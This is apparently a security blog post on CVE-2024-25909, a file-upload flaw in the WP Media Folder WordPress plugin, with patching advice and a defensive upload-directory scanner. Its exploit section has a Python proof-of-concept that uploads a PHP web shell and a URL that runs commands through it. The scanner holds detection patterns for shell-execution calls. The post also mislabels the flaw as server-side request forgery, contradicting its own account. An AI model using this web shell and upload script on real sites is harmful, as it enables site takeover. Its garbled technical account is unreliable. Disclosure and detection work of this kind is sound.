JoomUnited is a popular developer that has created many well-known and widely used plugins for WordPress. One of its most popular plugins is WP Media Folder, which lets you organize and manage your media files easily within WordPress. However, a vulnerability was recently discovered in this plugin that allows unrestricted uploads of dangerous file types. This critical security flaw was assigned the identifier CVE-2024-25909. In this post, we will examine the vulnerability, how it can be exploited, and how to take appropriate action to protect your website.

Vulnerability Details

The vulnerability, an Unrestricted Upload of Files with Dangerous Types, allows an attacker to upload a malicious file directly to your website, which can lead to remote code execution and other malicious activity. This is particularly dangerous because it can give an attacker full control of your website. The vulnerability affects WP Media Folder versions n/a through 5.7.2.

Exploit Details

The exploit involves a malicious user taking advantage of the server-side request forgery (SSRF) present in the WP Media Folder plugin. The attacker uploads a file with dangerous executable code, bypassing the checks that are supposed to prevent these types of uploads. The code snippet below demonstrates a simple proof-of-concept:

import requests

target_url = "http://target.com"
file_upload_url = f"{target_url}/wp-admin/admin-ajax.php?action=upload"

# Malicious file contents
file_data = '<?php echo shell_exec($_GET["cmd"]); ?>'

# Upload the malicious file
response = requests.post(
    file_upload_url,
    files={"file": ("exploit.php", file_data, "application/x-php")},
    data={"path": "/"},
)

The code above uploads a PHP file containing a call to shell_exec() to the target WordPress website. Once uploaded, an attacker could execute any command remotely by accessing the file through the site's URL. For example:

http://target.com/wp-content/uploads/exploit.php?cmd=id

Original References

The vulnerability was responsibly disclosed by the researchers who discovered it. More information about this issue is available at the following links:
1. CVE Details
2. JoomUnited

How to Protect Your Website

To protect your WordPress site from this particular vulnerability, it is highly recommended that you immediately update your WP Media Folder plugin to version 5.7.3 or higher. JoomUnited has already addressed the vulnerability in this version, and upgrading the plugin should resolve the issue.

Moreover, it is essential to adhere to security best practices on your site. Consider using a reputable security plugin, maintaining strong passwords, and regularly backing up your files and databases.
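As an added defensive check (example code written for this post, not JoomUnited's or the plugin's own), the script below scans a wp-content/uploads tree for the kind of file the proof-of-concept above drops: anything with a PHP-executable extension, or any file whose contents carry a PHP open tag or a shell-execution call. The sample uploads tree it builds, including the file names, is constructed for the demo.

```python
# Added example, not the post's own code: scan a WordPress uploads tree for
# executable PHP such as the exploit.php the post describes (demo tree constructed).
import os
import re
import tempfile

# Extensions a PHP handler typically executes; none belong under wp-content/uploads.
EXECUTABLE_EXTS = {".php", ".phtml", ".php3", ".php4", ".php5", ".php7", ".phar", ".phps"}
# Content markers: a PHP open tag, or a function that hands input to a shell.
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)
SHELL_CALLS = re.compile(rb"\b(shell_exec|exec|system|passthru|popen|proc_open|eval)\s*\(")

def inspect_file(path):
    """Return the reasons a file is suspicious; an empty list means it looks benign."""
    reasons = []
    ext = os.path.splitext(path)[1].lower()
    if ext in EXECUTABLE_EXTS:
        reasons.append(f"executable extension {ext}")
    with open(path, "rb") as fh:
        head = fh.read(64 * 1024)  # media can be large; the head is enough
    if PHP_TAG.search(head):
        reasons.append("contains PHP open tag")  # independent of the extension
    if SHELL_CALLS.search(head):
        reasons.append("calls a shell/eval function")
    return reasons

def scan_uploads(root):
    """Walk an uploads tree; return {relative_path: reasons} for flagged files."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            reasons = inspect_file(full)
            if reasons:
                findings[os.path.relpath(full, root)] = reasons
    return findings

def build_demo_uploads():
    """Constructed uploads tree: a benign image, the post's web shell, one hidden PHP."""
    root = tempfile.mkdtemp(prefix="uploads-")
    month = os.path.join(root, "2024", "02")
    os.makedirs(month)
    with open(os.path.join(month, "photo.jpg"), "wb") as fh:
        fh.write(b"\xff\xd8\xff\xe0" + b"\x00" * 32)  # JPEG magic, no code
    with open(os.path.join(root, "exploit.php"), "wb") as fh:
        fh.write(b'<?php echo shell_exec($_GET["cmd"]); ?>')  # payload from the post
    with open(os.path.join(month, "thumb.txt"), "wb") as fh:
        fh.write(b"<?php echo 'hello'; ?>")  # PHP behind a harmless-looking extension
    return root
```

Run scan_uploads() against your real uploads directory and treat every finding as an incident to investigate, not only the .php hits; a clean tree after the 5.7.3 update is the confirmation you want.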

Conclusion

CVE-2024-25909 serves as a critical reminder of the importance of staying current with security updates and being proactive when it comes to protecting your WordPress site. Regularly update all themes and plugins, follow security best practices, and maintain regular backups to ensure the security of your digital assets.

Timeline

Published on: 02/26/2024 16:27:59 UTC
Last modified on: 02/26/2024 16:32:25 UTC